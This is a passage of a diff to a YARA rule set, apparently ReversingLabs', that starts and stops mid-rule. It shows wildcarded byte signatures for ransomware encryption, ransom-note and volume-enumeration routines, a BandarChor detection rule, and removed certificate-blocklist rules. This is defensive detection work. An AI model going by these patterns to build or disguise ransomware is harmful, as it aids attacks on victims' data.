?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B + 7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03 + 4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ?? + 13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82 + } + $encrypt_files_v6_p1 = { + E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ?? + F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B + C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66 + 8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D + ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B + 75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 + } + $encrypt_files_v6_p2 = { + 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? + 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? + ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? + FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C + } + $encrypt_files_v6_p3 = { + 81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 + 66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 + 50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 + 45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 + ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? + ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 + 05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F + 11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45 + ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 + 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? + ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 + FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D + } + $set_default_icon_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 + 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98 + 66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D + 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45 + ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ?? + ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 + } + $set_default_icon_p2 = { + 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? + 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? + ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43 + 45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D + ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF + 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A + ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45 + ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 + ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? + ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 + } + $find_system_volumes = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? + ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ?? + C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90 + 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ?? + 83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2 + 51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ?? + 6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ?? + EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C + 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 + ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? + 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 + } + $drop_ransom_note_v2_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 + 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? + 8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE + ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D + 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D + ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ?? + 8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ?? + 83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66 + } + $drop_ransom_note_v2_p2 = { + 89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B + 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B + 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45 + ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72 + ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B + C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D + ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_v5 = { + 50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 + ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 + ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D + ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D + 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D + 04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 45 + } + $find_system_volumes_v2_p1 = { + C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A + ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50 + E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ?? + ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? + ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ?? + C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ?? + ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB + 8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ?? + 6A ?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6 + } + $find_system_volumes_v2_p2 = { + 45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? + 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? + ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE + 66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ?? + ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3 + 0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ?? + ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1 + F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6 + F3 0F E6 C0 C1 EE + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unirad LLC" and pe.signatures[i].serial=="56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($find_files) and ($encrypt_files_v1) and ($cmd_prompt) and ($exclude_from_encryption_v1)) or (($find_files) and ($cmd_prompt) and ($ldap_connect) and ($encrypt_files_v2) and ($exclude_from_encryption_v1)) or (($find_files) and ($cmd_prompt) and ($ldap_connect) and ($encrypt_files_v3) and ($exclude_from_encryption_v1)) or (($find_files) and ($encrypt_files_v4) and ($drop_ransom_note_v1) and ( all of ($exclude_from_encryption_v2_p*))) or (($find_files) and ($exclude_from_encryption_v1) and ( any of ($encrypt_files_v5)) and ( all of ($find_system_volumes_v2_p*))) or (( all of ($encrypt_files_v5_p*)) and ( all of ($set_default_icon_p*)) and ($find_system_volumes) and ( all of ($drop_ransom_note_v2_p*)) and ($find_files)) or (( all of ($encrypt_files_v6_p*)) and ( all of ($set_default_icon_p*)) and ( all of ($drop_ransom_note_v2_p*)) and ($find_files))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BandarChor ransomware." author = "ReversingLabs" - id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326" - date = "2023-11-08" - modified = "2023-11-08" + id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4498-L4516" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BandarChor" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FANATOR, OOO" and (pe.signatures[i].serial=="00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures[i].serial=="d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24") and 1599041760<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4518-L4536" - license_url = 